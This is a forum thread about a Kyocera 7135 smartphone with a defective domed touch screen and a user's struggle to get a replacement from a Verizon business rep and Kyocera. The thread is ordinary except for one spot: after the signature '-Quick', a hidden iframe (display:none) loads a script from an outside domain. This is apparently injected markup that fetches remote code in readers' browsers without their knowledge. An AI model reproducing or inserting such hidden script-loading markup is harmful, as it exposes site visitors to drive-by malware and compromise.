+ Reply to Thread

Disconcerting replacement policies.

So I got my 7135 through my Verizon B2B rep and received it 4/15. Yea! It didn't take very long to notice that the touch screen was "different" than my Palm Vx. The touch screen layer is "domed" and is maybe 1/16" off the LCD glass in the center of the screen. Everything works but its rather annoying when tapping on it since it has a different tactile feel in the center of the screen than towards the edges. In fact one can feel as well as hear the contact with the touch surface and then when the touch surface in turn contacts the LCD glass. This is really tough to describe to anyone with a normal screen without showing them.

I called Kyocera support and the rep there said she wasn't aware of this problem and that her screen felt uniform all the way across. I was thinking that maybe they were all this way. Support said it shouldn't be the way that I had described and said I should go through my Verizon rep first and if he couldn't do anything for me to call back.

Verizon rep keeps saying "well you said it works correctly so its an aesthetic problem". I keep saying "no, its a manufacturing defect and a usability problem. And I'm worried that it could effect long term durability". He finally says "Ok, I can send you another one. BUT. If its the same then you're stuck with it or you will have to deal with Kyocera directly". Subsequent call he tells me that he is waiting for a call back from his supervisor who he has told that I have a cosmetic problem and want a replacement...
    I'm worried that if he sends me another one and its from the same batch and there was a batch of bad screens...

I decide to try the direct Kyocera route first. Support agrees and submits it to the "RMA people" who apparently also make a cut on whether its a defect or not. RA person says that I will have to send it in for them to decide if its a defect and to verify that its not water or drop damaged. I ask "what about putting a hold on my CC and shipping me one so I can ship this one back when I get it?". Person doesn't seem to recognize this as an option. doh! So its back to my less than bend-over-backwards-your-problem-is-my-problem B2B rep. He says he will put in the order for the replacement "but you understand that if the replacement has a problem thats it and you're going to be dealing directly with Kyocera". What a guy!:p Then he mentions that I have to return the one I have in the original box and packing. "What?! I can't return it in the box the new one comes in?" "No, the serial numbers on the boxes are different" I'm hoping its all still in the recycle bin
    -Quick<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

You know you can return the thing and get a 100% refund and probably order another new device at the same B2B discount. Getting a replacement is convenient for you and also better for them because it saves them a lot of paperwork. Perhaps your clueless rep should be reminded of that fact.

That said, I suggest that if the device is actually working now, document the problem and send your concern to your B2B rep and get a confirmation receipt. If you have problems with the phone in the future, you'll have little trouble getting a replacement. You did warn them that the phone seemed defective. Given you being a B2B customer, they will likely want to keep your noise level down.

Well, after a frantic search of all the usual places in the house and office I found the box in an unusual place.:alieneyes I'll have him put in the replacement order tomorrow. Instead of "your problem is our problem" this guy has always immediately come across with "you're the problem". I spoke with his supervisor while making the original order and he seemed to be a really nice guy. I don't expect any permanent problems, its just kind of annoying to deal with this guy. Oh well. I would guess that with his attitude we'll be dealing with another rep in 6 months. Keeping my fingers crossed that the replacement won't have any problems (seems that for the most part the hardware quality of this phone is very good).
    -Quick

That's why they make insurance with a ridiculous deductable. Use it.

I hate Verizon!

He's still in his 15 day period. Just return it and buy another one, no?
    ---------------
    The same thing we do every night, Pinky...

Originally posted by BrerLapn
    He's still in his 15 day period. Just return it and buy another one, no?
    Well, I suspect that is why my rep has agreed to send me another one in exchange. Point is that the phone has a manufacturing defect that effects usability (initially, maybe durability long term). Ideally I would like that to reset my 15 day trial period. Realistically something in between. My rep keeps impressing on me that he will send me another phone "but thats it". If I have a problem with the next one I'm dealing directly with Kyocera. I have to respond each time that that is fine with me if the screen is the same but any other defect is a new issue. He never really explicitly acknowledges that.

The local stores got their live demo's Friday and I verified that my screen is indeed different and their's is as I would have expected. So I'm a bit (not much because of the above) worried that if I get another defective one I will have to ship it to Kyocera for a decision from them which means I will be without for a couple of weeks. I can always use my old phone with an ESN change but the Palm which I'm heavily dependent on would be a big problem.

-Quick

Well, tomorrow you should be able to walk into a Verizon store and get a 7135. If they are freely available, then it seems that your rep has no leverage for his "terms." Your 15 days is fifteen days. Your new phone should be a new phone, not a warranty replacement. Do not accept less than new. You have a right to a no-strings-attached return of your phone. If the phone is publicly available as of tomorrow (even if only through regular telesales), then you don't have to deal with this rep anymore to get it. I assume that's the only reason you're putting up with this rigamarole thus far. If he wants to lose his commission on your account or phone by being difficult, then his loss, right?

(Granted, this is all based on the assumption that we won't have to have special reconnaisance information on cooperative representatives to be able to buy a 7135 anymore).
    ---------------
    The same thing we do every night, Pinky...